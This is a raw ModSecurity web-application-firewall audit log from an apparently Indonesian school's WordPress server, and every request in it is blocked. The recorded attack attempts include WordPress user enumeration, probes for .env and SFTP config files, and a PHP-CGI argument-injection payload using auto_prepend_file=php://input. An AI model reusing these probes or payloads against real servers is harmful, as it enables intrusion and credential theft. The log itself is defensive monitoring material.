https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.137.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.137.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6293a004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6293a004-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749678672859163 3174 (- - -) Stopwatch2: 1749678672859163 3174; combined=1355, p1=489, p2=836, p3=0, p4=0, p5=29, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6293a004-Z-- --81258550-A-- [12/Jun/2025:04:51:44 +0700] aEn6cMCW7vAFWQIjJpx7CwAAAFM 103.236.140.4 33262 103.236.140.4 8181 --81258550-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.184.174.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.184.174.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81258550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81258550-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749678704468390 3223 (- - -) Stopwatch2: 1749678704468390 3223; combined=1363, p1=431, p2=895, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81258550-Z-- --fda57e2d-A-- [12/Jun/2025:05:17:56 +0700] aEoAlGDP2O-J0msTyvUvegAAAI0 103.236.140.4 56508 103.236.140.4 8181 --fda57e2d-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.184.80.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.184.80.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* --fda57e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fda57e2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749680276863817 830 (- - -) Stopwatch2: 1749680276863817 830; combined=305, p1=268, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fda57e2d-Z-- --7b7bc736-A-- [12/Jun/2025:05:18:07 +0700] aEoAn6F10OasdbQdujhQXgAAAM8 103.236.140.4 56946 103.236.140.4 8181 --7b7bc736-B-- GET /deployment.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.184.80.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.184.80.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* --7b7bc736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b7bc736-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749680287661832 2057 (- - -) Stopwatch2: 1749680287661832 2057; combined=723, p1=324, p2=377, p3=0, p4=0, p5=22, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b7bc736-Z-- --e6e9ae03-A-- [12/Jun/2025:05:18:07 +0700] aEoAn6F10OasdbQdujhQYgAAANQ 103.236.140.4 56956 103.236.140.4 8181 --e6e9ae03-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.184.80.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.184.80.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* --e6e9ae03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6e9ae03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749680287837569 722 (- - -) Stopwatch2: 1749680287837569 722; combined=301, p1=268, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6e9ae03-Z-- --86bed649-A-- [12/Jun/2025:05:27:40 +0700] aEoC3PiOwnjCOc5ARoV9WwAAAAI 103.236.140.4 50294 103.236.140.4 8181 --86bed649-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.241.232.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.241.232.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86bed649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86bed649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749680860433719 2962 (- - -) Stopwatch2: 1749680860433719 2962; combined=1716, p1=605, p2=1077, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86bed649-Z-- --224e8403-A-- [12/Jun/2025:06:13:15 +0700] aEoNi6F10OasdbQdujiUhwAAANU 103.236.140.4 43348 103.236.140.4 8181 --224e8403-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.150.255.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.150.255.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --224e8403-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --224e8403-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749683595059863 2412 (- - -) Stopwatch2: 1749683595059863 2412; combined=1111, p1=364, p2=719, p3=0, p4=0, p5=28, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --224e8403-Z-- --3f0d4e0e-A-- [12/Jun/2025:06:40:01 +0700] aEoT0cCW7vAFWQIjJpzr7AAAAEQ 103.236.140.4 59938 103.236.140.4 8181 --3f0d4e0e-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3f0d4e0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0d4e0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749685201789683 740 (- - -) Stopwatch2: 1749685201789683 740; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0d4e0e-Z-- --12206a0a-A-- [12/Jun/2025:06:53:32 +0700] aEoW_KF10OasdbQdujjPmwAAAME 103.236.140.4 38628 103.236.140.4 8181 --12206a0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 212.237.127.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 212.237.127.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --12206a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12206a0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749686012404334 2380 (- - -) Stopwatch2: 1749686012404334 2380; combined=1057, p1=337, p2=693, p3=0, p4=0, p5=27, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12206a0a-Z-- --fe90ce23-A-- [12/Jun/2025:06:54:45 +0700] aEoXRWDP2O-J0msTyvWrvwAAAI8 103.236.140.4 41374 103.236.140.4 8181 --fe90ce23-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 Accept-Charset: utf-8 --fe90ce23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe90ce23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749686085568857 711 (- - -) Stopwatch2: 1749686085568857 711; combined=298, p1=262, p2=0, p3=0, p4=0, p5=35, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe90ce23-Z-- --21d06b23-A-- [12/Jun/2025:07:22:38 +0700] aEodzsCW7vAFWQIjJpwcoAAAAEA 103.236.140.4 50024 103.236.140.4 8181 --21d06b23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.112.34.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.112.34.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --21d06b23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21d06b23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749687758549691 3284 (- - -) Stopwatch2: 1749687758549691 3284; combined=1734, p1=562, p2=1144, p3=0, p4=0, p5=28, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21d06b23-Z-- --c2e7932a-A-- [12/Jun/2025:08:43:52 +0700] aEow2MCW7vAFWQIjJpxxugAAAEs 103.236.140.4 38228 103.236.140.4 8181 --c2e7932a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.93.235.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.93.235.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2e7932a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2e7932a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749692632616679 4220 (- - -) Stopwatch2: 1749692632616679 4220; combined=2428, p1=782, p2=1593, p3=0, p4=0, p5=52, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2e7932a-Z-- --5a5e040f-A-- [12/Jun/2025:08:59:46 +0700] aEo0kviOwnjCOc5ARoVY3AAAAAc 103.236.140.4 45750 103.236.140.4 8181 --5a5e040f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.0.154.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.0.154.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5a5e040f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a5e040f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749693586638085 27728 (- - -) Stopwatch2: 1749693586638085 27728; combined=51022, p1=401, p2=790, p3=0, p4=0, p5=24938, sr=59, sw=0, l=0, gc=24893 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a5e040f-Z-- --e6935f3e-A-- [12/Jun/2025:09:06:12 +0700] aEo2FPiOwnjCOc5ARoVdoQAAABY 103.236.140.4 60336 103.236.140.4 8181 --e6935f3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.79.248.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.79.248.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6935f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6935f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749693972882067 2785 (- - -) Stopwatch2: 1749693972882067 2785; combined=1162, p1=405, p2=716, p3=0, p4=0, p5=41, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6935f3e-Z-- --e1e78370-A-- [12/Jun/2025:09:07:27 +0700] aEo2X8CW7vAFWQIjJpyQHAAAAFc 103.236.140.4 34940 103.236.140.4 8181 --e1e78370-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 150.136.76.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 150.136.76.116 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --e1e78370-C-- --e1e78370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1e78370-E-- --e1e78370-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749694047960128 7031 (- - -) Stopwatch2: 1749694047960128 7031; combined=5000, p1=765, p2=4191, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1e78370-Z-- --9c047127-A-- [12/Jun/2025:10:03:45 +0700] aEpDkaF10OasdbQdujjALAAAAM4 103.236.140.4 56856 103.236.140.4 8181 --9c047127-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.87.154 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.87.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9c047127-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c047127-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749697425392565 721 (- - -) Stopwatch2: 1749697425392565 721; combined=291, p1=261, p2=0, p3=0, p4=0, p5=30, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c047127-Z-- --85a90350-A-- [12/Jun/2025:10:19:34 +0700] aEpHRqF10OasdbQdujjYlQAAANM 103.236.140.4 52086 103.236.140.4 8181 --85a90350-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.191.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.191.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Accept-Charset: utf-8 --85a90350-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85a90350-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749698374601954 673 (- - -) Stopwatch2: 1749698374601954 673; combined=279, p1=243, p2=0, p3=0, p4=0, p5=35, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85a90350-Z-- --7bb07c56-A-- [12/Jun/2025:10:46:38 +0700] aEpNnmDP2O-J0msTyvWylwAAAIM 103.236.140.4 52134 103.236.140.4 8181 --7bb07c56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.118.46.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.118.46.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7bb07c56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bb07c56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
